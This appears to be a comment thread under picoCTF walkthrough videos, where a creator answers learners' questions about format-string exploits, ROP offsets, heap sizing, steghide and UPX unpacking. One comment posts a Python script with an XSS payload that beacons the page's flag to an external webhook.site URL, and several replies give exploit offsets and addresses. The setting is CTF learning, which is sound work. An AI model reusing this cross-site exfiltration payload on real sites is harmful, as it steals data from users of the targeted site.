Python allows you to create characters you can't type on the keyboard. E.g. \x03 has no corresponding key on the keyboard.

@@carlislemc Gotcha thanks. Is there another any difference between using python or echo -e to solve this problem, or are they both equivalent for similar use cases?

​@@kekmanzzz7548that would also work

import requests import json javascript = """let beacon = new PendingGetBeacon(`webhook.site/49a609bf-0f68-4a13-b4db-6ed8dd64c805/${state.flag}`); beacon.sendNow(); """ payload = { "xss": javascript, "recipe": [['Earth', 'Water'], ['Earth', 'Fire'], ['Air', 'Earth'], ['Air', 'Water'], ['Magma', 'Mist'], ['Magma', 'Mud'], ['Fire', 'Mud'], ['Fire', 'Mist'], ['Obsidian', 'Water'], ['Air', 'Rock'], ['Fog', 'Mud'], ['Hot Spring', 'Sludge'], ['Fire', 'Steam Engine'], ['Brick', 'Mud'], ['Hot Spring', 'Steam Engine'], ['Earth', 'Obsidian'], ['Brick', 'Fog'], ['Computer Chip', 'Steam Engine'], ['Dust', 'Heat Engine'], ['Adobe', 'Cloud'], ['Electricity', 'Software'], ['Computer Chip', 'Fire'], ['Artificial Intelligence', 'Data'], ['Encryption', 'Software'], ['Fire', 'Sand'], ['Internet', 'Program'], ['Glass', 'Software'], ['Cybersecurity', 'Vulnerability'], ['Exploit', 'Web Design']] } print(json.dumps(payload)) r = requests.post("rhea.picoctf.net:54776/remoteCraft", params={'recipe': json.dumps(payload)}) print(r.text)

At what point in the video does the challenge work differently for you?

Printf stops reading when it gets to a null byte no matter how it's entered. It will only read up to the first address and anything afterwards is ignored because of the 0s

@@tomk8312 printf does stop at the null byte, but you should still have the bytes on the stack to access with the % operators as long as they all appear before the null bytes. You'll note that I put %22$lx before the addresses.

Thanks for the feedback

I got to 4th flag but couldnt figure out the final one 😅

Mostly by reading writeups at CTF time

This should be clear if you decompress with UPX and then put the resulting unpacked executable into Ghidra along with the PDB.

You can see this by looking at the sections in Ghidra on the original executable.

Look at time @5:05. There are 0x18 (24 bytes), plus 4 more for the stored value of ebp. As for the pop ebx gadget, you need to make sure to move up the stack because otherwise you don't have enough room for the parameters.

Is the password actually hidden somewhere? If anyone know pls let me know. Or if theres anyother way to solve this pls let me know

This is designed to be a motivational CTF for people who are just getting started with CTFs, so some of the problems are indeed quite easy.

@@carlislemc Makes sense

Since we allocated 36 bytes, we don't have to fill the entire structure, just get "pico" in the correct place.

@@carlislemc Gotcha, thanks again!

I do say 5 or 2, and I can brute force those choices.

It is a Debian installer for steghide

@@carlislemc thank you for the answer and the videos you made. I use kali so I downloaded it from its terminal with apt and worked for the ctf problem.

Use the first portion of the flag as the password to open the zip file

Glad it was helpful to you!

Glad you like them!

To write both halves of the number, we write to 0x404060 and 0x404062. 20 represents how far we have to walk up the stack to find our address.

@@carlislemc Got it, thanks!

Windows Subsystem for Linux

@@carlislemc thanks you!

I've had this problem when I'm at work and my workplace IT people are blocking my queries at their firewall.

@@carlislemc Thanks for the reply, I'll try on another network 👍

That sounds like your disk is full (or maybe an error during download). Try to free up some space and unzip again (or redownload the file).

I should have automated it in Burpsuite

No, I don't think so because you have to look at the picture.

Because you aren't allowed to put in an arbitrary string, but only one on the menu.

Cookie manager - Cookie editor from addons

Thanks for the kind words

You have to round the size to a multiple of 4.

@@carlislemc Thank you very much. So if it would be the size of 41, I should use 44. Got it 👍

As I understand it, you just have to allocate >=35 and then just get "pico" in the rigth place in memory. It dosen't matter if you don't fill all of the allocated space.

Basically all the Intel chips are little endian.

Perhaps you should read something like: axcheron.github.io/exploit-101-format-strings/

You might want to read more about format string specifiers, e.g. cplusplus.com/reference/cstdio/printf/.